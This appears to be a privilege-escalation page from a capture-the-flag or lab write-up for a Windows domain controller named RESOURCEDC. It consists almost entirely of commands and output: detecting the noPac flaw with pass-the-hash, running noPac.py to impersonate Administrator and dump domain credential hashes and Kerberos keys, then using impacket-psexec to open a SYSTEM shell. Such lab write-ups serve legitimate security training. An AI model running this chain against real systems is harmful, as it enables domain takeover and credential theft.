Priv Esc

PreviousEnumeration NextCredentials / Notes / LL

Last updated 6 months ago

$ netexec smb 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 -M nopac SMB 192.168.170.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False) SMB 192.168.170.175 445 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 NOPAC 192.168.170.175 445 RESOURCEDC TGT with PAC size 1450 NOPAC 192.168.170.175 445 RESOURCEDC TGT without PAC size 653 NOPAC 192.168.170.175 445 RESOURCEDC NOPAC 192.168.170.175 445 RESOURCEDC VULNERABLE NOPAC 192.168.170.175 445 RESOURCEDC Next step: https://github.com/Ridter/noPac

$ python noPac.py resourced.local/L.Livingstone -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.170.175 -dc-host RESOURCEDC --impersonate Administrator -dump -just-dc-user Administrator -use-ldap ███ ██ ██████ ██████ █████ ██████ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██████ ██ ██ ██ ██████ [*] Current ms-DS-MachineAccountQuota = 10 [*] Selected Target RESOURCEDC.resourced.local [*] will try to impersonate Administrator [*] Adding Computer Account "WIN-LKSXTEHHJQ3$" [*] MachineAccount "WIN-LKSXTEHHJQ3$" password = FuKyJY@u0fZW [*] Successfully added machine account WIN-LKSXTEHHJQ3$ with password FuKyJY@u0fZW. [*] WIN-LKSXTEHHJQ3$ object = CN=WIN-LKSXTEHHJQ3,CN=Computers,DC=resourced,DC=local [*] WIN-LKSXTEHHJQ3$ sAMAccountName == RESOURCEDC [*] Saving a DC's ticket in RESOURCEDC.ccache [*] Reseting the machine account to WIN-LKSXTEHHJQ3$ [*] Restored WIN-LKSXTEHHJQ3$ sAMAccountName to original value [*] Using TGT from cache [*] Impersonating Administrator [*] Requesting S4U2self [*] Saving a user's ticket in Administrator.ccache [*] Rename ccache to Administrator_RESOURCEDC.resourced.local.ccache [*] Attempting to del a computer with the name: WIN-LKSXTEHHJQ3$ [-] Delete computer WIN-LKSXTEHHJQ3$ Failed! Maybe the current user does not have permission. [*] Pls make sure your choice hostname and the -dc-ip are same machine !! [*] Exploiting.. [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5 Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3 Administrator:des-cbc-md5:0de34cf7bf32898f [*] Cleaning up...

$ netexec smb 192.168.170.175 -u Administrator -H 8e0efd059433841f73d171c69afdda7c SMB 192.168.170.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False) SMB 192.168.170.175 445 RESOURCEDC [+] resourced.local\Administrator:8e0efd059433841f73d171c69afdda7c (Pwn3d!)

$ impacket-psexec resourced.local/Administrator@192.168.170.175 -hashes :8e0efd059433841f73d171c69afdda7c Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra [*] Requesting shares on 192.168.170.175..... [*] Found writable share ADMIN$ [*] Uploading file oWGowvHH.exe [*] Opening SVCManager on 192.168.170.175..... [*] Creating service RERK on 192.168.170.175..... [*] Starting service RERK..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.2145] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig ResourceDC nt authority\system 54564fec8409f1ef939bc1292ab5192d Windows IP Configuration Ethernet adapter Ethernet0 2: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 192.168.170.175 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.170.254